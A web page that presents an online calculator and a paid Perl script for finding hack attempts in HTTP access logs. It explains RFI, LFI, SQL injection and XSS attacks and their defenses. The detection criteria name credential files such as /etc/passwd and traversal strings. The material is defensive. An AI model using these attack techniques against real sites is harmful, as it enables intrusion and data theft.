25 Years of Programming
An open source source for C, C++, OWL, BASIC, MDB, XLS, DOT, and more...
Home   Projects   Up   Sitemap   Search   Blog   Forum+Chat   About Us   Privacy   Terms of Use   Feedback   FAQ   Images   Services   Payments   Humor   Music

Online calculator to identify hack attempts in website access logs

Your site, to exclude it from RFI report. Not recommended unless needed2:
http://www./
 

Instructions

Paste into the above box one or more complete lines from your website's HTTP access logs. Click Analyze.

The lines you copy and paste should look like the following example of a typical CLF (Combined Log Format) log line. Be sure you are copying from the correct type of log (for example, not an FTP log):

111.222.333.444 - - [01/Nov/2010:02:21:59 -0800] "GET /forum/index.php HTTP/1.1" 200 17637 "http://referersite.com/pagewithlink.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Where to find your access logs and how to download and unzip them are described in a related article.

There is no set limit to the number of log lines you can paste into the box. The analysis is done by JavaScript in your browser, so the limit is whatever JavaScript is able to handle3.

If the calculator identifies hack attempts, they are classified by type and sorted into the text boxes below.

For easier viewing, copy and paste the text from each box into (preferably) a plain text editor that does not automatically turn URLs into hyperlinks. If it does create clickable links, don't click them, and don't visit the sites any other way, either. Websites mentioned in hack attempts should be considered potentially dangerous.

Description

Some of my articles about website security recommend searching your HTTP access logs for "suspicious requests", which raises the questions:

  • What does a suspicious request look like?
  • I found a line in my log that looks strange, but is it a hack attempt or not?

The previous articles had some examples and discussion, but this online calculator takes a different approach: it analyzes real-life data from your own logs and shows you which lines are hack attempts. It even classifies and sorts them by the type of hack attempt they appear to be.

Log Analysis Results

Remote File Inclusion (RFI) Attacks

An RFI attack requests one of your PHP pages (or a page that might have PHP code in it, whether the name indicates so or not). In the query string of the request, it sets the value of a variable. It sets the value to be a string containing the URL of a file (usually a PHP script, no matter what its name is) on a remote website. When your own PHP script attempts to use the variable, it mistakenly fetches the script from the remote site and runs it. That script runs as though it is part of your script, so it can do anything PHP can do, and it has complete access to your entire website just like your own PHP script does. That's what makes RFI attacks so dangerous.

Defenses against RFI include methods of php.ini, .htaccess, using only the latest versions of applications like WordPress, and being especially careful to avoid RFI security holes when writing your own PHP code. More specifically: your first layer of defense should be that when your site receives an RFI attack, it should refuse to process the request, sending back a 403-Forbidden response instead of the requested page. Your second layer of defense should be to have PHP configured so that allow_url_fopen or allow_url_include are Off so your server will not allow itself to fetch files from remote websites at all. Your third layer of defense should be to have PHP register_globals set to Off so that the variable names passed via the HTTP query string do not automatically become usable by your PHP code. Your fourth layer of defense should be that even if an RFI attack gets past .htaccess, the PHP code it is targeting should not have any RFI vulnerabilities, so that the attack cannot succeed, anyway.

Potential false positives:

  • A line is considered an RFI attack if it contains http:// or ftp:// in the request query string (everything following the first question mark in a GET request). Some websites legitimately (but usually unnecessarily) call their own pages using URLs in this format. If the part after http:// is the name of your own website, the request is not suspicious.

Local File Inclusion (LFI) Attacks

An LFI attack also targets PHP pages. It tricks your PHP script into fetching important system files from your server and printing them on the output page. If it prints the contents of an encrypted password file, for example, the hacker can use fast offline cracking methods to decrypt it and then gain access to your server as one of its system users.

LFI attacks can be blocked at the .htaccess level by banning requests for a) the frequently requested system files, b) the ./ string they often use to try to traverse directories and find the location of the system file they want. At the application level, the defense is much the same as for RFI: if you absolutely must choose which file to reference in an include() command based on input you received from the visitor, don't use the incoming value directly. Instead, make a hard-coded list in your script of the possible legal values for that variable. Compare the incoming value against the list, and if it doesn't exactly match one of the values in the list, do NOT use the user-provided value in the include().

Potential false positives:

  • Some non-malicious robots crawl websites using relative paths such as ./filename or ../filename. The calculator will flag these as LFI, but if the requests are only for your normal web pages and don't make references to system files like /proc/self/environ or /etc/passwd, they're not.

SQL Injection Attacks

An SQL Injection attack contains SQL code in the request. SQL is a language for transferring data to and from a database. PHP or ASP code often takes data input provided by the website visitor and combines it with SQL template code to form a database query which it sends to the database. If it uses an insecure method to combine the two, then the input provided by the visitor, instead of being just data, can be interpreted as SQL code. If it actually is SQL code, the commands it contains will be executed on the database. It can corrupt the database, enter malicious data into it, delete it entirely, or dump its contents on the web page. The attacker doesn't need to know the database username/password because the script they are hijacking already knows them.

SQL Injection attacks can be blocked at the .htaccess level by banning a) certain SQL keywords or combinations of them that don't occur in your legitimate filenames/URLs, b) punctuation and other special characters common in SQL Injection attacks that don't occur in your legitimate filenames/URLs. Your next, and more common, layer of defense is to keep all your applications such as WordPress updated to their latest versions so that if an SQL Injection vulnerability is found in the code, you receive the improved version as quickly as possible. If you write your own database connection code, it's important to guard against SQL Injection.

Log File or Statistics Analyzer Attacks

In contrast to an RFI attack, which contains a reference to an external PHP file on a remote website, these attacks contain actual snippets of PHP or HTML code. The intent is that a program that either handles the request or puts it onto an output page will inadvertently either run the PHP code or place the HTML hyperlink on a report page without sanitizing it to make it plain text. The amount of code they can put in the request is limited, so it usually does something simple like echo a "Success" message so the hacker can tell whether the injection worked or not. 

Also assigned to this category are lines that contain one or more quotation marks that are escaped with a backslash (example: \"). When a legitimate request contains a quotation mark, it is usually encoded in a way that avoids using an actual quotation mark character. In a CLF log file, quotation marks are the delimiters for some of the fields. When a real quotation mark is received, it is typically escaped in the log with a backslash, which avoids getting that quote confused with the delimiter quotes. However, some people send HTTP requests containing embedded backslashes in carefully chosen locations with the intent of causing the delimiter quotes to be escaped (or internal quotes not to be escaped), thus corrupting the log and making it more difficult to parse or import into a database.

Cross-site Scripting (XSS) Attacks

In a cross-site scripting attack, someone creates a hyperlink to one of your pages. In the hyperlink is a snippet of JavaScript. They hope your page will echo the snippet directly to the page without sanitizing it (without converting special characters to HTML entities), in which case the JavaScript will run when someone loads the page.

The entries in this box are usually tests to determine whether your page has an XSS vulnerability. When they get the result page, they can see whether their JavaScript snippet was executed. If it was, they will craft and place their malicious link somewhere, and try to get people to click on it.

The ways to avoid XSS vulnerabilities are: 1) keep web applications updated to their latest versions, 2) in your own code, whenever you receive text from a user and echo it back onto a page, pass it through the PHP htmlentities() function (or equivalent) first. This will, for example, put "<script" onto a page as "&lt;script". A browser receiving "<script" thinks it is supposed to run the script, but when it receives "&lt;script", it knows without confusion that it's supposed to put the text on the page.  

Miscellaneous Attacks

Other requests that the calculator considers suspicious. Some examples:

  • Suspicious characters "catch-all": The request contains coded carriage returns, line feeds, or null bytes, which are not supposed to be in an HTTP request string. The intent is usually to corrupt the server's handling of the request, resulting in mishandling it. Or the request contains punctuation characters that are frequently used for malicious purposes, such as: [] {} () <> ' " * \  The calculator is aggressive about flagging these characters even though they are legitimate ones which can be, and often are, used in URL filenames or query string data. If your URLs normally contain these characters, this box will contain a lot of false positives.
  • User-agent = "libwww-perl" or "core-project". There's nothing inherently suspicious about these requests except that in my experience these user agents are usually up to no good.
  • The HTTP PUT method puts a file directly on your server. Very suspicious. Not the method that most webmasters normally use.
  • The string ".htaccess" does not normally appear in web requests unless you use something like CKEditor or TinyMCE to edit it. Or unless a hacker is using a web shell to edit it.
  • At some webhosts, your initial entry to your cPanel is recorded in your access logs (your subsequent activity there is not). If there are /cpanel log entries from IP addresses other than yours, someone else is trying to log in as you. There is no way to tell from the log whether they succeeded.

Not Attacks

These are the log entries that were not classified as attacks. If any of the lines that land in this box actually are malicious, it means I need to revise the calculator to catch them and assign them an attack type. The reason this box is on the page is to make those types of errors easier to spot.

Notes

  1. Displaying the non-malicious requests is optional because the amount of memory needed to store them for display can be significant if you are processing many lines of log entries. Most requests are non-malicious.
     
  2. If the RFI Attacks report shows many false positives because there are log entries with a format like:
    GET /yourpage.ext?var=http://yoursite.com/file.ext,
    you can enter the name of your website in the box provided. Lines matching your own website (with and without www.) will be excluded from the RFI Attacks report. When an exclusion is in effect, there is a small possibility that some actual RFI attacks might fail to be reported, such as if the URL has two http:// references, one to your own site and a second one to a real attack site. It's best not to use the exclusion option unless you really need it.
     
  3. Using Firefox 4 on my computer, the calculator can handle at least 16,000 log lines at a time. The slowest part of the operation is pasting the text into the input box. I tried pasting 360,000 lines (95 MB), but after 15 minutes the paste hadn't even finished and I gave up waiting. Internet Explorer 8 is much slower and gives the appearance of becoming unstable and unresponsive even if it will, eventually, complete successfully. I'd suggest limiting IE to 1,000 lines at a time.
     
  4. When using log analysis as the basis for crafting .htaccess ban rules, it is important to test your prospective new rules against entries from your old access logs to make sure they won't also ban legitimate requests. One way is to load the log into a database program and run your rules as regular expression searches on the database. Then examine which lines would have been banned by the rule. If legitimate requests would have been banned, adjust the rule. Then, after putting new rules into effect on your server, it's important to watch your logs closely (and cPanel > Latest Visitors, for a real-time view) to make sure legitimate requests are not being refused.
     

Bug reports, feature suggestions, comments, questions can be submitted in the discussion forum.


Hack Attempt Identifier - Perl script

For frequent use or for processing large log files, this Perl script that you run from the command line is faster, easier, and more efficient. It reads one or more log files that you specify and sorts the hack attempts into separate output files.

You must have the Perl language installed on your PC to run this script. Perl is useful for utility and text processing tasks like this one. I developed and tested this script with Perl 5.10.0 in Ubuntu Linux and with ActivePerl 5.10.1 in Windows.

Example usage:

perl -WT HackAttemptIdentifier.pl -x"mysite.com" -n logfile1...

Options: 
-x|--exclude"website.com"  Exclude your own website from tests for RFI
-n|--shownonmalicious      Also write non-hack lines to a file
-h|--help                  Show this help and exit

It creates the following plain text output files in the current working directory:

Identified-RFI.log
Identified-LFI.log
Identified-SQLINJECTION.log
Identified-XSS.log
Identified-LOGPGM.log
Identified-MISC.log
Identified-NONMALICIOUS.log

It uses this Perl module:

use Getopt::Long;

The program's code structure and formatting is more like typical C++ formatting than typical Perl formatting.

Download link Description
US$8.00 (22 KB)

The zip file contains 3 versions of the script. The only differences are the line ends:
Linux=LF, Windows=CRLF, Mac=CR. Rename the version you want to use to HackAttemptIdentifier.pl.

The Buy Now button goes to the PayPal website:

  • If you pay from your PayPal account, PayPal automatically redirects you to my download page.
     
  • If you pay with a credit card, the redirect to my download page is not automatic. You will see a "Return to Merchant" button/link on the last PayPal confirmation page. Click that link to go to my download page.
     
  • If you cancel the transaction at PayPal with their "Cancel and return to [my email address]" link, you will return to this page you are reading now instead of going to the download page.

 

Valid HTML 4.01 Transitional Valid CSS
Yahoo! Search
Search the web Search this site
View content labeling at ICRA.